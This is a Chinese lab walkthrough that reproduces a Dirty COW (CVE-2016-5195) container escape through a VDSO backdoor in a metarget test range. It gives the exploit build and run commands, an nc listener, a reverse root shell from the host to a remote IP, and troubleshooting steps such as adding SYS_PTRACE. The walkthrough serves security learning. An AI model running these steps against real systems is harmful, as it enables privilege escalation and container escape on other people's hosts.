竞争条件意为任务执行顺序异常,可能导致应用崩溃或面临攻击者的代码执行威胁。利用该漏洞,攻击者可在其目标系统内提升权限,甚至获得root权限。VDSO就是Virtual Dynamic Shared Object(虚拟动态共享对象),即内核提供的虚拟.so。该.so文件位于内核而非磁盘,程序启动时,内核把包含某.so的内存页映射入其内存空间,对应程序就可作为普通.so使用其中的函数。
在容器中利用VDSO内存空间中的“clock_gettime() ”函数可对脏牛漏洞发起攻击,令系统崩溃并获得root权限的shell
【漏洞环境】 linux内核版本: kernel2.x ~ kernel4.8.3linux内核版本: kernel2.x ~ kernel4.8.3 【环境搭建】
- 利用metarget靶场搭建漏洞环境
【漏洞利用】
root@zyliang:~/metarget# ./metarget cnv list | grep 2016-5195| cve-2016-5195 | kernel | container_escape |root@zyliang:~/metarget# ./metarget cnv install cve-2016-5195cve-2016-5195 is going to be installedswitching kernel by versionadding apt repository deb http://security.ubuntu.com/ubuntu trusty-security mainadding apt repository deb http://security.ubuntu.com/ubuntu xenial-security mainadding apt repository deb http://security.ubuntu.com/ubuntu bionic-security mainswitching kernel version with aptinstalling kernel package linux-image-4.2.0-42-genericmodifying grub config fileupdating grubcve-2016-5195 successfully installedreboot system now? (y/n) y#重启root@zyliang:~# uname -aLinux zyliang 4.2.0-42-generic #49~14.04.1-Ubuntu SMP Wed Jun 29 20:22:11 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
- 测试环境下载
root@zyliang:~# git clone https://github.com/gebl/dirtycow-docker-vdso.gitCloning into 'dirtycow-docker-vdso'...remote: Enumerating objects: 11, done.remote: Total 11 (delta 0), reused 0 (delta 0), pack-reused 11Unpacking objects: 100% (11/11), done.
- 远程机器监听本地端口
root@master:~# ifconfig ens160ens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500inet 10.160.35.200 netmask 255.255.255.0 broadcast 10.160.35.255inet6 fe80::250:56ff:fead:4476 prefixlen 64 scopeid 0x20<link>ether 00:50:56:ad:44:76 txqueuelen 1000 (Ethernet)RX packets 26461525 bytes 2973982791 (2.9 GB)RX errors 0 dropped 71 overruns 0 frame 0TX packets 26412095 bytes 16041084586 (16.0 GB)TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0root@master:~# nc -lvvp 1234Listening on [0.0.0.0] (family 0, port 1234)
- 运行测试容器
root@zyliang:~/dirtycow-docker-vdso# sudo docker-compose run dirtycow /bin/bashroot@3a91b45e2ca5:/# lsbin boot dev dirtycow-vdso etc home lib lib64 media mnt opt proc root run runnit.sh sbin srv sys tmp usr var
- 进入容器,编译Poc程序并执行
root@3a91b45e2ca5:/# cd dirtycow-vdso/root@3a91b45e2ca5:/dirtycow-vdso# ls0xdeadbeef.c LICENSE Makefile README.md payload.s toolsroot@3a91b45e2ca5:/dirtycow-vdso# makenasm -f bin -o payload payload.sxxd -i payload payload.hcc -o 0xdeadbeef.o -c 0xdeadbeef.c -Wallcc -o 0xdeadbeef 0xdeadbeef.o -lpthreadroot@3a91b45e2ca5:/dirtycow-vdso# ./.git/ 0xdeadbeef tools/root@3a91b45e2ca5:/dirtycow-vdso# ./0xdeadbeef 10.160.35.200:1234[*] payload target: 10.160.35.200:1234[*] exploit: patch 1/2[*] vdso successfully backdoored[*] exploit: patch 2/2[*] vdso successfully backdoored[*] waiting for reverse connect shell...^C
- 远端机器10.160.35.200拿到宿主机shell
【遇到的问题】
root@master:~# nc -lvvp 1234Listening on [0.0.0.0] (family 0, port 1234)Connection from 10.160.36.203 60936 received!ifconfigbr-39727c7d519e: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500inet 172.18.0.1 netmask 255.255.0.0 broadcast 172.18.255.255inet6 fe80::42:e6ff:fe3c:bab4 prefixlen 64 scopeid 0x20<link>ether 02:42:e6:3c:ba:b4 txqueuelen 0 (Ethernet)RX packets 0 bytes 0 (0.0 B)RX errors 0 dropped 0 overruns 0 frame 0TX packets 5 bytes 438 (438.0 B)TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0cni0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1450inet 10.244.0.1 netmask 255.255.255.0 broadcast 0.0.0.0inet6 fe80::70ed:64ff:fe65:fcda prefixlen 64 scopeid 0x20<link>ether 72:ed:64:65:fc:da txqueuelen 1000 (Ethernet)RX packets 568 bytes 41403 (41.4 KB)RX errors 0 dropped 0 overruns 0 frame 0TX packets 564 bytes 187916 (187.9 KB)TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0docker0: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500inet 172.17.0.1 netmask 255.255.0.0 broadcast 172.17.255.255ether 02:42:f7:00:90:09 txqueuelen 0 (Ethernet)RX packets 0 bytes 0 (0.0 B)RX errors 0 dropped 0 overruns 0 frame 0TX packets 0 bytes 0 (0.0 B)TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0ens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500inet 10.160.36.203 netmask 255.255.255.0 broadcast 10.160.36.255inet6 fe80::250:56ff:fead:54b prefixlen 64 scopeid 0x20<link>ether 00:50:56:ad:05:4b txqueuelen 1000 (Ethernet)RX packets 703 bytes 89044 (89.0 KB)RX errors 0 dropped 12 overruns 0 frame 0TX packets 441 bytes 97055 (97.0 KB)TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
- 容器编译后运行Poc程序,出现segmentation fault - 问题现象
root@fddcd5e6574d:/dirtycow-vdso# ./0xdeadbeef[*] payload target: 127.0.0.1:1234[*] exploit: patch 1/2Segmentation fault
- <font style="color:rgba(0, 0, 0, 0.9);">问题原因: poc环境docker版本过高,默认禁止所有cap</font>- <font style="color:rgba(0, 0, 0, 0.9);">解决方法:容器的cap添加SYS_PTRACE</font>
root@zyliang:~/dirtycow-docker-vdso# pwd/root/dirtycow-docker-vdsoroot@zyliang:~/dirtycow-docker-vdso# cat docker-compose.ymlversion: '2'services:dirtycow:build: .restart: unless-stoppedcap_add:- SYS_PTRACE
- 网络问题导致镜像编译失败 - 问题: https://github.com/scumjr/dirtycow-vdso.git ,容器内无法下载
root@zyliang:~/dirtycow-docker-vdso# cat DockerfileFROM ubuntu:14.04RUN apt-get updateRUN apt-get install -y build-essentialRUN apt-get install -y nasmRUN apt-get install -y gitRUN mkdir /dirtycow-vdsoRUN git clone https://github.com/scumjr/dirtycow-vdso.git /dirtycow-vdsoADD runnit.sh /RUN chmod 755 /runnit.shEXPOSE 1234CMD ["/runnit.sh"]root@zyliang:~/dirtycow-docker-vdso#
1、多次编译下载
- <font style="color:rgba(0, 0, 0, 0.9);">解决方法</font>
2、注释掉git及后续部分,通过其它方式下载项目后,tar打包copy到容器中使用 【其它Poc】
https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs
若有收获,就点个赞吧
0 人点赞
